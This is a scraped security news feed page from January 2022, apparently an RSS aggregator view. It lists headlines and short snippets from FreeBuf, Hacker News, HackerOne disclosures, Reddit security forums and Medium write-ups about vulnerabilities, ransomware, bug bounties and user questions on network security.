    Go 1.18 — native Fuzzing and Dinosaurs
    Last month, the Go language team released the Go 1.18 Beta 1. It contains the much awaited generic support, which we’re very excited to… Continue reading on Medium »  ( 4 min )
  • Open

    乌克兰警方成功逮捕袭击 50 多家公司的勒索软件团伙
    乌克兰警方逮捕了五名网络犯罪分子,据悉,该团伙使用勒索软件袭击了约50家美国和欧洲企业。  ( 1 min )
    知识大陆Q&A vol.03 | 新大陆的第一步
    正式版上线热门提问合集!  ( 1 min )
    FreeBuf街采 | 2022开年我们找10位路人聊了聊网络安全
    FreeBuf小伙伴在街头对路人进行了随机采访,看看他们的网络安全意识、个人防护意识到底如何。
    Java代码审计 —XSS跨站脚本
    通过分析XSS的产生原因来解决如何防御XSS的问题  ( 4 min )
    FreeBuf周报 | 「网安知识大陆」1.0正式上线;Facebook推出“隐私中心”
    各位 FreeBufer 周末好~以下是本周的「FreeBuf周报」,我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    3月2日上海见!CIS 2021 Spring·春日版议题即将公布
    FreeBuf邀请全体网安人于 3 月 2 日至 3 日 在上海宝华万豪酒店 共聚「CIS 2021网络安全创新大会Spring·春日版」。  ( 1 min )
    白宫举办开源安全峰会,众多科技巨头参加
    当地时间1月13日,众多科技巨头公司和联邦机构共聚白宫,就开源软件安全性展开讨论。
    联软科技发布:2022年端点安全十大趋势
    作为中国企业端点安全领域的领导者,联软科技历经19年端点安全实践和行业经验,连续3年持续发布前沿端点安全趋势,旨在为行业提供更多新思路和新参考。  ( 1 min )
    伊朗APT35黑客组织利用Log4j漏洞部署新型PowerShell后门
    研究表示,伊朗APT35组织正在利用Log4Shell漏洞进行攻击并植入一种新型后门。  ( 1 min )
  • Open

    Snikket Server – 2022-01-13 security release (CVE-2022-0217)
    Article URL: https://snikket.org/blog/snikket-jan-2021-security-release/ Comments URL: https://news.ycombinator.com/item?id=29931694 Points: 1 # Comments: 0  ( 2 min )
  • Open

    The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More
    We identify recent trends in web threats, including top malware families. Web skimmers, difficult to detect and easy to deploy, are highlighted. The post The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More appeared first on Unit42.

  • Open

    Bug Report : [ No Valid SPF Records ]
    Ruby disclosed a bug submitted by sohaib619: https://hackerone.com/reports/1301696
    AEM forms XXE Vulnerability
    Adobe disclosed a bug submitted by ismailmuh: https://hackerone.com/reports/1321070
    Disclosure of github access token in config file via nignx off-by-slash
    Adobe disclosed a bug submitted by letm3through: https://hackerone.com/reports/1386547
    Reflected xss and open redirect on larksuite.com using /?back_uri= parameter.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/955606 - Bounty: $500
    [IDOR] Modify other team's reminders via reminderId parameter
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/946323 - Bounty: $500
  • Open

    Propagating phishing via Slack webhooks
    submitted by /u/amirshk [link] [comments]
    Forensics Analysis of the NSO Group’s Pegasus Spyware
    submitted by /u/CyberMasterV [link] [comments]  ( 1 min )
    BreakingFormation: Orca Security Research Team Discovers AWS CloudFormation Vulnerability
    submitted by /u/eberkut [link] [comments]  ( 1 min )
    SSH Bastion Host Best Practices
    submitted by /u/old-gregg [link] [comments]
    HiddenWall is a tool to generate a custom Hidden firewall to run in Linux kernel.
    submitted by /u/CoolerVoid [link] [comments]  ( 2 min )
    This script analyses the Nmap XML scanning results, parses each CPE context and correlates to search CVE on NIST. You can use that to find public vulnerabilities in services.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
  • Open

    Security bulletin for recent AWS Glue vulnerability
    Article URL: https://aws.amazon.com/security/security-bulletins/AWS-2022-002/ Comments URL: https://news.ycombinator.com/item?id=29927538 Points: 2 # Comments: 0  ( 2 min )
    CVE-2021-31166: MS HTTP Protocol Stack Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166 Comments URL: https://news.ycombinator.com/item?id=29924445 Points: 16 # Comments: 0
    Severe Vulnerability Found in Another NPM Package
    Article URL: https://twitter.com/DevNackOfficial/status/1481671995167506433 Comments URL: https://news.ycombinator.com/item?id=29923463 Points: 4 # Comments: 0  ( 1 min )
    AWS Superglue Vulnerability
    Article URL: https://orca.security/resources/blog/aws-glue-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29923004 Points: 29 # Comments: 3  ( 5 min )
    BreakingFormation: AWS CloudFormation Vulnerability
    Article URL: https://orca.security/resources/blog/aws-cloudformation-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29922522 Points: 79 # Comments: 22  ( 5 min )
    Attacking RDP from Inside: Remote Desktop Named Pipe Vulnerability
    Article URL: https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside Comments URL: https://news.ycombinator.com/item?id=29920955 Points: 2 # Comments: 0  ( 11 min )
    Found a Vulnerability In NPM Package
    Article URL: https://twitter.com/DevNackOfficial/status/1481537073068843013 Comments URL: https://news.ycombinator.com/item?id=29918100 Points: 1 # Comments: 2  ( 1 min )
    Exploring the Log4Shell Vulnerability through files
    Article URL: https://blog.borneo.io/exploring-the-log4shell-vulnerability-dd7000eed4a4?gi=5d43b39b3d22 Comments URL: https://news.ycombinator.com/item?id=29915825 Points: 2 # Comments: 0  ( 7 min )
  • Open

    SPF Record Question
    If a root domain like sendgrid.net is added to an SPF record, does that mean any free user or paid user of sendgrid can spoof an email from your domain and SPF checks would pass? submitted by /u/mtx4gk [link] [comments]  ( 1 min )
    How do I check if I visited a site with malware?
    I was browsing through reddit and clicked on a link in r/dermotology that send me to a weird site that played a weird video and there was no question or content besides that. I used virus total to check the website and it looks like they're using it for advertising revenue clicks, but my paranoia is kicking in. Site was visited on an android with calyx is using duckduckgo version 5.106.0 So the question is- any ideas if I have to nuke this phone? For the curious the website is below. All the spaces are slashes minus the dot com part. vebotto com 2022 01 13 cystic-pimple submitted by /u/instantpotbeans [link] [comments]  ( 2 min )
    Google Drive Security - VPN and MFA
    Hi there, I'm posting here to get some expert advice, we are a small startup dealing with very sensitive customer data. Problems we are having - How do we best protect customer data within Google Drive? Customers often share data to us via Google Drive. In security questionnaire, we often get this question - is VPN required for employees to access customer data? We can of course turn on VPN requirement for this, but it also adds friction to use Google Drive on a daily basis. Google Drive has MFA turned on, but it does not seem to enforce zero trust policy, and we are never prompted to enter passwords regularly. Any suggestions here? submitted by /u/Commercial_Rip7550 [link] [comments]  ( 1 min )
    Reverse engineering question
    Hi r/AskNetsec I've got a pretty unusual question in regards to RE that might sound weird, or it's just not making sense to me (and baring in mind, I am a beginner to reversing malware). I am currently writing a report and within the report format, "reverse engineering" and "disassembly" are two different sections. This doesn't really make much sense to me. Disassembly is already a form of reverse engineering. Nevertheless, the information that you could insert into an RE section would be Wireshark analysis, viewing the file in PEStudio for instance, but those are already in sections relating to static & dynamic analysis. So what would be inserted into a reverse engineering section regarding malware? I can literally only think of unpacking the malware as everything else that would constitute reverse engineering is in other sections. Honestly, I have no idea. When I asked for some help in regards to knowing the distinction between the two, I was told that "disassembly" is a noun, and "reverse engineering" is a verb. Which is probably right, but it didn't help at all. An example of breaking encryption was proposed in relation to RE. Again, it didn't shed much light for me. I just want to be familiar with the distinction here. Thanks. submitted by /u/pat0000 [link] [comments]  ( 2 min )
    Need an antivirus solution for webapp in MS Azure that is compliant with EU data protection law
    we run an webapp in azure. users can upload .zip, .pdf, .png, .jpeg and .csv files. therefore an antivurs scanner is needed for those files. at another project we use clamav in an azure container instance. the problem is containers don´t scale very well. we would prefere a SAAS solution in azure but there are few options. we need a solution that is scalable and doesn´t send the files to servers outside the EU due to the local data protection law. at best the software is made by an EU company. we thought about "abusing" an azure storage by uploading the files there and waiting if microsoft defender for cloud reacts. anyone any experience with this? how fast would such a solution be? any recommendations? TLDR: need antivirus software for file upload webapp in azure SAAS prefered scalability compliant with EU data protection law Thank you for your help! submitted by /u/devsecops22 [link] [comments]  ( 2 min )
    Brave Browser --Flags Questions
    Hi there r/AskNetsec I just wanted to ask a quick question if these specific flags out of the bunch that Brave runs is of any concern? The names sparked my interest and a bit of panic when I first noticed after using it for about a month. IdleDetection --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed ​ Whole flag trace is this if needed: [redacted]\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --origin-trial-public-key=[redacted]=,[redacted]= --brave_session_token=[redacted] --field-trial-handle=[redacted],[redacted],[redacted] --enable-features=AutoupgradeMixedContent,LegacyTLSEnforced,PasswordImport,PrefetchPrivacyChanges,Red…  ( 1 min )
    Is there a solution to encrypt an OS at the RAM/CPU level?
    Thinking about cloud threat models, is there a solution that exists that can encrypt an OS at the RAM/CPU level to further restrict hosting providers ability to reach, view and use a machine outside of the usual disk encryption. While I am sure it’s a a long shot but there does exist a possibility where can access the machine from a local terminal via their hosting infrastructure or dump the RAM on the hypervisor. Is there any way or value in preventing that or is it just a risk that has to be accepted when using a cloud provider? submitted by /u/concon2015 [link] [comments]  ( 1 min )
  • Open

    AVG Tune Up
    Anybody know what service AVG Tuneup uses to perform a cleanup when the program is executed? submitted by /u/mikefromjerz [link] [comments]  ( 1 min )
    I’ve heard SANS FOR508 and the GCFA is challenging. How challenging is it for an entry level candidate who is just starting out?
    Any tips? Experiences? I’ve had hands on forensics experience and have FOR500 knowledge. Is FOR508 doable? submitted by /u/curiousgal1996 [link] [comments]  ( 3 min )
  • Open

    Using GitHub to manage your first CVE
    Article URL: https://authzed.com/blog/using-github-to-manage-your-first-cve/ Comments URL: https://news.ycombinator.com/item?id=29925154 Points: 4 # Comments: 0  ( 9 min )
    CVE-2021-31166: MS HTTP Protocol Stack Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166 Comments URL: https://news.ycombinator.com/item?id=29924445 Points: 16 # Comments: 0
    Prosody 0.11.12 released (CVE-2022-0217 fix)
    Article URL: https://blog.prosody.im/prosody-0.11.12-released/ Comments URL: https://news.ycombinator.com/item?id=29921870 Points: 3 # Comments: 0  ( 1 min )
    A Quick CVE-2022-21907 FAQ (work in progress)
    Article URL: https://isc.sans.edu/forums/diary/28234/ Comments URL: https://news.ycombinator.com/item?id=29917559 Points: 2 # Comments: 1  ( 1 min )
  • Open

    Index of Movies, TV series and Documentaries (lots of BBC, how it's made etc..).
    submitted by /u/josephalbright1 [link] [comments]  ( 1 min )
    Sporalis
    https://drive.google.com/drive/folders/1rmL4Yn7mJ78emYQ-PjIhDGYkph_9iEjZ https://drive.google.com/drive/folders/1s3v5WdrPLEvnGLbzM8RGSyI0iorkbU-W https://drive.google.com/drive/folders/1nitHECSorEadPtGwK5F_9-TdAcHHJGZG submitted by /u/Burlack [link] [comments]
    Dont mind me. Just dropping some links to check size before downloading
    https://drive.google.com/drive/folders/1X2L-UtctJulbDEP63NnLSwlEaXgwTe0x https://drive.google.com/drive/folders/1pMRoHMd3H0P0g6lvEWFUR1teiPSy9VqR https://drive.google.com/drive/folders/0B2UZmHpzoVm6eXYyM09PUXF1TDA?resourcekey=0-A5ZN-_lF1S2Eh3xmJSC9kw https://drive.google.com/drive/folders/1nfMA72hL1PHFTWVkzjlSBAmfPyBg89dx https://drive.google.com/drive/folders/17KyX_80h0yBUrc3X-PMa3EnXoE0kFmJJ?sort=13&direction=a submitted by /u/Burlack [link] [comments]  ( 1 min )
    FTP OEM Pc Builder
    I'm trying to list the different ftp from computer builder. I think most of them are already present on this / r. But perhaps bringing them together in a single post is a good idea? (I will add them as I find them / the community finds them) HP FTP : ftp://ftp.hp.com |Url: ftp://ftp.hp.com/||Urls file| |Extension (Top 5)|Files|Size| |.exe|106,034|5.61 TiB| |.ibr|862|5.21 TiB| |.zip|10,739|443.95 GiB| |.fmw|290|384.7 GiB| |.iso|256|322.51 GiB| |Dirs: 83,006 Ext: 1,375|Total: 793,218|Total: 12.98 TiB| |Date (UTC): 2022-01-12 17:29:09|Time: 02:19:06|Speed: 22.87 MB/s (182.9 mbit)| Created by [KoalaBear84's OpenDirectory Indexer v2.2.0.9](https://github.com/KoalaBear84/OpenDirectoryDownloader/) IBM FTP : ftp://ftp.software.ibm.com/ |Url: ftp://ftp.software.ibm.com/||Urls file| |Extension (…  ( 2 min )
  • Open

    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on System Weakness »  ( 3 min )
    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on Medium »  ( 2 min )
    Why Bugfix Postmortems Are Good For Web3
    This past year has been eventful for anyone building on the Web3 stack — over the course of the year, DeFi has grown from a nascent… Continue reading on Immunefi »  ( 3 min )
    Launching Collector Portal for a closed beta group
    We are proud to announce our beta platform launch for selected users starting on the 26th of January. Continue reading on Envoy »  ( 2 min )
    FB Lite All Users Active Status Changed
    I’m glad you’re here. Please have fun reading (nmochea). Continue reading on Medium »  ( 1 min )
    C.S.T.I Lead To Account Takeover $$$
    Hello amazing hunter, Today i want to tell you a short story but this story has long memory for me. In this story i found some… Continue reading on System Weakness »  ( 2 min )
    Bug Bounty Methodology — Bug Hunting Checklist (PART-1)
    Hey, it’s me again back with another checklist. I saw various articles and tools specifically designed to exploit one vulnerability. It… Continue reading on Medium »  ( 2 min )
    My Perfect Bug Bounty Docker Setup
    I hate installing things on my computer because of the bloated slow mess it becomes overtime. So when I found out about docker I fell in… Continue reading on System Weakness »  ( 3 min )
    PHP Type Juggling
    PHP is the dynamic language that checks variables when the program is executing and provides flexibility to the developers. But this… Continue reading on Medium »  ( 1 min )
  • Open

    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on System Weakness »  ( 3 min )
    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-01-13 Review
    将EXE程序通过Powershell形式实现无文件运行 by ourren QRS 2021 论文录用列表 by ourren 从分析一个赌球APP中入门安卓逆向、开发、协议分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-13 Review
    将EXE程序通过Powershell形式实现无文件运行 by ourren QRS 2021 论文录用列表 by ourren 从分析一个赌球APP中入门安卓逆向、开发、协议分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    FreeBuf早报 | 大量美国和加拿大人的财务数据遭曝光;Firefox 出现无法联网问题
    全球动态1. 因解决BUG不力,密码管理工具LastPass或面临2000万欧元罚款因解决问题不力等诸多问题,知名密码管理工具 LastPass 正面临 2000 万欧元的 GDPR 罚款风险。[阅读原文]2.美国一监狱遭勒索软件攻击,监控摄像头与门禁系统被破坏美国新墨西哥州中部的阿尔伯克基(Albuquerque)地区监狱上周遭勒索软件攻击,监控摄像头无法访问、自动门禁系统也受到了影响,导致囚犯  ( 1 min )
    Freebuf甲方群话题讨论 | 聊聊企业远程办公的安全之道
    从安全角度来看,远程办公意味着办公网络的边界被打破,企业该如何重新审视自身的安全策略,降低安全风险?  ( 1 min )
    数百万便携式路由器受KCodes NetUSB 漏洞影响
    涉及厂商包括 Netgear、TP-Link、Tenda、EDiMAX、D-Link 和西部数据。  ( 1 min )
    大量美国和加拿大人的财务数据遭曝光
    Website Planet网络安全员发现一个配置错误的数据库,该数据库暴露了约 82万 条记录,其中约 60万 条是客户信用记录。  ( 1 min )
    跨平台恶意后门 SysJoker 行为分析及解码
    2021 年 12 月,Intezer 发现了一个能够对 Windows、Mac 和 Linux 发起攻击的跨平台后门 SysJoker。  ( 1 min )
    新型恶意软件SysJoker正对Windows、Linux 和macOS 操作系统构成威胁
    SysJoker 新型恶意软件正对Windows、Linux 和 macOS 操作系统构成威胁,可利用跨平台后门来从事间谍活动。  ( 1 min )
    《“十四五”数字经济发展规划》,网络安全再被重点提及
    《规划》的第九章“着力强化数字经济安全体系”系统阐述了网络安全对于数字经济的独特作用及重要性。
    研读网络安全法律法规,提升技术管理者 “法” 商
    了解不同法律法规的等级层次,可以帮助我们更好的理解国家在立法过程中的目的。  ( 1 min )
  • Open

    Burp Suite roadmap for 2022
    With 2022 now underway, it's about time we gave you the latest on where Burp Suite is heading this year. Here we take a look at the powerful new Burp Suite features we'll be working on in 2022 - as we  ( 5 min )
  • Open

    Burp Suite roadmap for 2022
    With 2022 now underway, it's about time we gave you the latest on where Burp Suite is heading this year. Here we take a look at the powerful new Burp Suite features we'll be working on in 2022 - as we  ( 5 min )
  • Open

    Real or Fake? Spoof-Proofing Email With SPF, DKIM, and DMARC
    I briefly mentioned using DKIM to verify an email’s sender in a previous blog post that described the steps I took to determine whether a suspicious email was legitimate or a phishing attempt. In this post, we will take a deeper dive into how organizations can help stop email spoofing using a combination of three... The post Real or Fake? Spoof-Proofing Email With SPF, DKIM, and DMARC appeared first on TrustedSec.  ( 12 min )
  • Open

    Fuzzing101 with LibAFL – Part IV: Fuzzing LibTIFF
    Article URL: https://epi052.gitlab.io/notes-to-self/blog/2021-11-26-fuzzing-101-with-libafl-part-4/ Comments URL: https://news.ycombinator.com/item?id=29920636 Points: 1 # Comments: 0  ( 26 min )
  • Open

    Wading Through Muddy Waters | Recent Activity of an Iranian State-Sponsored Threat Actor
    submitted by /u/dmchell [link] [comments]
  • Open

    HONEYPOT DISCUSSIONS PART-1
    Welcome to Honeypot Discussions Part 1. There will be three part of article about honeypots. As here, in the first article we will be… Continue reading on Medium »  ( 5 min )

  • Open

    Miscellaneous Gaming Stuff.
    https://www.thegameisafootarcade.com/wp-content/uploads/ submitted by /u/EmuAnon34 [link] [comments]
    Are there such things as open navidrome / airsonic music servers to listen to?
    Rather than open directories of music, are there open servers that can be used with navidrome / airsonic clients to listen to the music? Are there strings one can use to maybe find them? The search engines aren't finding anything submitted by /u/papabear_12 [link] [comments]  ( 1 min )
  • Open

    Ransomware Damage Claims Driving Insurance Hikes
    The costs of cyber insurance policies are rising exponentially while underwriters are tightening the rules around who qualifies for cyber insurance, and at the same time, insurer capacity is constricting dramatically. The numbers are all over the place, but the latest statistics from the Council of Insurance Agents and Brokers reported a 25.5% increase in […] The post Ransomware Damage Claims Driving Insurance Hikes appeared first on Security Weekly.  ( 3 min )
  • Open

    Defeating EDRs with Office Products
    submitted by /u/dmchell [link] [comments]
  • Open

    Exploiting URL Parsing Confusion Vulnerabilities
    submitted by /u/ScottContini [link] [comments]
    Exploit Kits vs. Google Chrome
    submitted by /u/stashing_the_smack [link] [comments]
    Malicious modifications to open source projects affecting thousands
    submitted by /u/MiguelHzBz [link] [comments]  ( 1 min )
    Pre-Auth RCE in Moodle Part II - Session Hijack in Moodle's Shibboleth
    submitted by /u/albinowax [link] [comments]
    ThePhish is an open-source tool that automates the entire phishing email analysis process starting from the extraction of the observables from the header and the body of an email to the elaboration of a verdict which is final in most cases. It is based on TheHive, Cortex and MISP.
    submitted by /u/emalderson [link] [comments]  ( 1 min )
    Ransomware Actor May Have Leaked Their Previous Victims
    submitted by /u/Acrobatic-Pen-9949 [link] [comments]  ( 1 min )
    Researchers release final version of academic study testing 25 EDR and EPP vendors against attacks vectors via CPL, HTA, DLL and EXE
    submitted by /u/woja111 [link] [comments]  ( 1 min )
    [CFP] Call for Papers for Hardwear.io Security Conference USA 2022 is OPEN!
    submitted by /u/hardweario [link] [comments]
  • Open

    AFL TUTORIALS FOR BEGINNERS 0X00
    yeni başlayanlar için, afl ile derleme, lib/obje kullanımı,afl/afl++ ile fuzzing nasıl yapılır Continue reading on Medium »  ( 2 min )
  • Open

    AFL TUTORIALS FOR BEGINNERS 0X00
    yeni başlayanlar için, afl ile derleme, lib/obje kullanımı,afl/afl++ ile fuzzing nasıl yapılır Continue reading on Medium »  ( 2 min )
  • Open

    Lessons learned from my 10 year open source project
    For the past ten years, I’ve been building a popular open source project. Here are the lessons I’ve learned along the way. Continue reading on Medium »  ( 11 min )
    Bundesservice Telekommunikation — wie ich versehentlich eine Tarnbehörde in der Bundesverwaltung…
    Vor einigen Tagen tat ich etwas, dass ist so ungewöhnlich, das es scheinbar noch fast niemand vor mir gemacht hat: Ich habe mir die Liste… Continue reading on Medium »  ( 6 min )
    OSINT PAKISTAN POLITICIANS
    OSINT CASE STUDY 2 Continue reading on Medium »  ( 3 min )
    It’s a Match! Dating Apps and SOCMINT
    Just like any other social media platform, dating sites are platforms which can be used in online investigations. Considering the current… Continue reading on Medium »  ( 4 min )
  • Open

    Creative / Effective ways to run a security awareness program?
    it's that time of the year again: we are looking to renew our contract with our security awareness vendor. Basically, they provide a portal where people need to go to watch video's of how to prevent the regular security stuff (identify tailgating, spot phishing mails, etc). Some of these video's don't even make sense (e.g. we are for 99% working from home. Tailgating is not a real issue here). Part of this is a "must do" (due to compliance/certification requirements). However, there must surely be a more fun/creative way of doing this? What are some nice/creative ways you have setup security awareness within your organization? Side-note: yes, I know this should be risk based. Yes, I know I should talk to other departments to identify there needs. ;) Just looking for some experiences and idea's. submitted by /u/Flagcapturer [link] [comments]  ( 1 min )
    What is your home setup like and what tech gadgets do you have in your room?
    Hi I work in the InfoSec industry and having worked from home for the last year or so, I want to now start doing up my room and make it very techy At the moment, I do not have anything too exciting or amazing but I am interested to know what your home setups are like Thanks submitted by /u/dasozis [link] [comments]  ( 2 min )
    I get to help design a Cybersecurity room
    As the title says I get to help design a cyber security room for a community college. I want to ask the Netsec community. What would you like to see if you were young and were curious about this world? Tools you wish you had? Something that would of made you excited when you walked past to get into cyber security? All recommendations welcome, thank you! submitted by /u/benxfactor [link] [comments]  ( 3 min )
    Any resources/guides on pen-testing a network not facing the internet?
    Anyone have any resources for pen-testing a network that's supposed to be air gapped? I'm working with some colleagues to pen-test our professors lab as part of our assignment--mainly putting together a report on how we would approach the system if we had hands on access as both an admin and as a non privileged user. The lab itself is pretty simple--its not to be supposed running any web apps or even to be touching the internet. Most pentest guides are great at showing you how to approach scanning the network for misconfigurations and vulnerabilities and then moving over to web applications but I'm wondering if were limited to just enumerating the system and hoping for the best? Mainly looking for resources I can use as references to back any ideas on whats doable. Thanks. submitted by /u/CyberspaceAggressor [link] [comments]  ( 1 min )
    Another subnetting question!
    I'm given the following network address - 209.165.201.0 /24. If I'm splitting this network into two, LAN1 will have 29 hosts and LAN2 with 17 hosts. What I did to subnet this network was incorrect but I don't know the correct answer. I thought LAN1 would have an IP of 209.165.201.0 /27 and LAN 2 would be 209.165.201.33 /27, but from what I understand now is that these subnets cannot share the same CIDR. How would you go about doing this? submitted by /u/crumbjuice [link] [comments]  ( 1 min )
    Potential Risk from Using Bluetooth Headset on a company laptop?
    My company provides work laptops and headsets. However they don't have option for wireless headsets, only wired ones. They also advise against connecting any non company authorised peripherals to the laptop. I am wondering though, what would be realistic risks from connecting a Bluetooth headset to a laptop? submitted by /u/rw1337 [link] [comments]  ( 3 min )
    Internship Questions
    About a month after getting my CCNA training, I have my first interview for an internship in well-known MNC bank in networking field.. & I'm terribly nervous Guys, can you help me with some common questions asked in Bank Networking Interview.. submitted by /u/Aggressive-Dot-7339 [link] [comments]  ( 1 min )
    Best Identity Theft services for Companies
    In your experience what are the best Identity Theft services for Companies/Brands (not for indivisuals)? I an talking of services like: Identity Guard LifeLock IdentityForce Watchdog Thanks for the answers. submitted by /u/NerdSupremacist [link] [comments]  ( 2 min )
    Scanning for Network Listening Device - What is Blackice?
    Hey all, first of all, thanks for any help anyone can provide. I have a limited background in network security understanding from my undergrad in computer science, but have not dipped my toes in seriously in a while, so kinda stumbling through trying to figure this out. A friend asked me to check their network for any rogue listening devices and after a quick scan with Nmap, I came across this device on 192.168.0.1 described as "blackice-icecap". A quick google search makes it sound like this might actual be some kind of device setup to monitor network traffic. Is this something that is worth digging deeper into or am I misunderstanding this? What other avenues for rogue network monitoring should I be looking into? My first thought is that this is all probably a bit over my head, but I thought I'd at least give it a quick peak to see if I can find anything obvious to help my friend out. Thanks again for any feedback or advice. For reference, here is the relevant part of the Nmap result: Nmap scan report for 192.168.0.1 Host is up (0.033s latency). Not shown: 995 closed tcp ports (conn-refused) PORT STATE SERVICE 80/tcp open http 443/tcp open https 5000/tcp open upnp 8081/tcp filtered blackice-icecap 8082/tcp filtered blackice-alerts ​ submitted by /u/wwants [link] [comments]  ( 1 min )
    Using mobile hotspot on my laptop. Where do I turn on VPN - phone or laptop?
    Hi all Simple question but very hard to find the answer. When I dont have access to good wifi, Im going to be using mobile hotspot to access the internet on my laptop. Question is, where do i turn on my vpn - on my laptop? Or on my phone? Or just to be safe, on both? submitted by /u/AliveandDrive [link] [comments]  ( 3 min )
    Password Cracking LDS
    Has anyone ever done a password audit against an Active Directory LDS server (not regular AD server)? If so any directions on how to extract the hashes using standard tools like ImPacket or DSInternals? We have procedure to crack our AD passwords using these tools but LDS seems to be a slightly different beast. submitted by /u/clayjk [link] [comments]  ( 1 min )
    Best way to remove card from multiple services?
    I would like to unlink my card details on various services. It would be kind of a lot of work to login to each service and delete that info. Is there another way? Would just getting a new card be a good option? submitted by /u/extremexample [link] [comments]  ( 2 min )
    Can the operators of SS7s pull SMSs from carriers in the US at will?
    Provocative title, I know. "At will" is subjective. It was claimed in a post yesterday and today that this is something that SS7 operators can do (which is true). I talked to a security researcher (Lucky 225 on Twitter) who told me that the US is more locked down than other countries and phones 2014+ are using LTE implying that maybe most phones in the US aren't vulnerable to this. Of course, he's not a god and not omnipotent as none of us are. There are things that he doesn't know (as is the case for us all). Does anyone have more information on this that could clarify the extent of the vulnerability in terms of location, G (2G, 3G, etc) and limitations so we can know what we might be vulnerable to? Obviously, getting access to an SS7 is WAY harder than a smartphone, sim card and someone's personal info so maybe this isn't the biggest threat, but still... submitted by /u/iExtrapolate314 [link] [comments]  ( 4 min )
  • Open

    Cybrary
    Hello, I’m currently pursuing my BS in Computer Forensics and Digital Investigation. I can across Cybrary and was wondering if that can help me practice more on the subject? I still feel very lost when taking college course, I want to get more practice in me just want to know if Cybrary is worth the annual membership. If any one has some tips on what courses to take there or other sites I would appreciate it. Thank you in advance. submitted by /u/Sudden_Ad9859 [link] [comments]  ( 1 min )
    Investigating Message Read Status in Gmail & Google Workspace
    submitted by /u/No_Reflection_3360 [link] [comments]  ( 1 min )
    Interview questions
    So I read the FAQ and went through the SANs link which is posted to prepare for interviews in forensics. I am a recent graduate with a DF degree, and I had my first interview the other day but I am wondering what I could expect for the technical portion of the interview. Are there certain artifacts or definitions I should make sure I’m familiar with that can help? or any common scenario questions that get asked? I apologize if this isn’t the right place to ask this. submitted by /u/investtam [link] [comments]  ( 2 min )
  • Open

    Playing with Kerberos tickets (Host service)
    I’m going to share the results of some experimentation with Kerberos tickets. I’m sorry if this doesn’t add any new value or someone else… Continue reading on System Weakness »  ( 8 min )
  • Open

    Where can I learn windows binary exploitation from the basics?
    submitted by /u/wlo1337 [link] [comments]  ( 1 min )
  • Open

    EscapeRoom — PCAP Analysis with Wireshark
    This article provides my approach for solving the EscapeRoom CTF created by The Honeynet Project on the CyberDefenders website, a blue…  ( 8 min )
    Windows application exploitation series PART 1 — Leaky Handles
    What are handles? As per MSDN, Objects are data structures that represent a system resource, this can be a file, process, thread, etc. However, we cannot interact with them directly, to access the…  ( 3 min )
    Day 9 CN- Network Security Devices #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    CyberDefenders | L’espion
    The OSINT write-ups  ( 4 min )
    [Day 2] Web Exploitation Elf HR Problems | Advent of Cyber 3 (2021)
    The second day, we will be learning about Authentication Bypass.  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control  ( 3 min )
    Secure Development Principles
    When developing new applications, a particularly web based or mobile applications, software development teams often find themselves fixing…  ( 7 min )
  • Open

    EscapeRoom — PCAP Analysis with Wireshark
    This article provides my approach for solving the EscapeRoom CTF created by The Honeynet Project on the CyberDefenders website, a blue…  ( 8 min )
    Windows application exploitation series PART 1 — Leaky Handles
    What are handles? As per MSDN, Objects are data structures that represent a system resource, this can be a file, process, thread, etc. However, we cannot interact with them directly, to access the…  ( 3 min )
    Day 9 CN- Network Security Devices #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    CyberDefenders | L’espion
    The OSINT write-ups  ( 4 min )
    [Day 2] Web Exploitation Elf HR Problems | Advent of Cyber 3 (2021)
    The second day, we will be learning about Authentication Bypass.  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control  ( 3 min )
    Secure Development Principles
    When developing new applications, a particularly web based or mobile applications, software development teams often find themselves fixing…  ( 7 min )
  • Open

    EscapeRoom — PCAP Analysis with Wireshark
    This article provides my approach for solving the EscapeRoom CTF created by The Honeynet Project on the CyberDefenders website, a blue…  ( 8 min )
    Windows application exploitation series PART 1 — Leaky Handles
    What are handles? As per MSDN, Objects are data structures that represent a system resource, this can be a file, process, thread, etc. However, we cannot interact with them directly, to access the…  ( 3 min )
    Day 9 CN- Network Security Devices #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    CyberDefenders | L’espion
    The OSINT write-ups  ( 4 min )
    [Day 2] Web Exploitation Elf HR Problems | Advent of Cyber 3 (2021)
    The second day, we will be learning about Authentication Bypass.  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control  ( 3 min )
    Secure Development Principles
    When developing new applications, a particularly web based or mobile applications, software development teams often find themselves fixing…  ( 7 min )
  • Open

    SecWiki News 2022-01-12 Review
